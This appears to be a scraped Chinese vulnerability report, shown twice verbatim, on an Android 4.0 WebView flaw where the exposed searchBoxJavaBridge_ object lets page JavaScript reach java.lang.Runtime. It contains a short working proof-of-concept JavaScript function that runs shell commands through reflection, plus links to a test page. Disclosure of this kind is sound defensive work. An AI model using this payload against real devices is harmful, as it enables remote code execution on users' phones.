VULHUB ™

### 简要描述： oo ### 详细说明： 浏览器来说这种问题还是需要修补的 导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在，4.2以上版本不存在 ``` function execute(cmdArgs) { return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); } ``` 测试页面:http://drops.wooyun.org/webview.html 参见:http://drops.wooyun.org/papers/548 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201401/2717102853910ae8918b37d1079da7fb3fc385c7.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/2717102853910ae8918b37d1079da7fb3fc385c7.jpg)

### 简要描述： oo ### 详细说明： 浏览器来说这种问题还是需要修补的 导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在，4.2以上版本不存在 ``` function execute(cmdArgs) { return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); } ``` 测试页面:http://drops.wooyun.org/webview.html 参见:http://drops.wooyun.org/papers/548 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201401/2717102853910ae8918b37d1079da7fb3fc385c7.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/2717102853910ae8918b37d1079da7fb3fc385c7.jpg)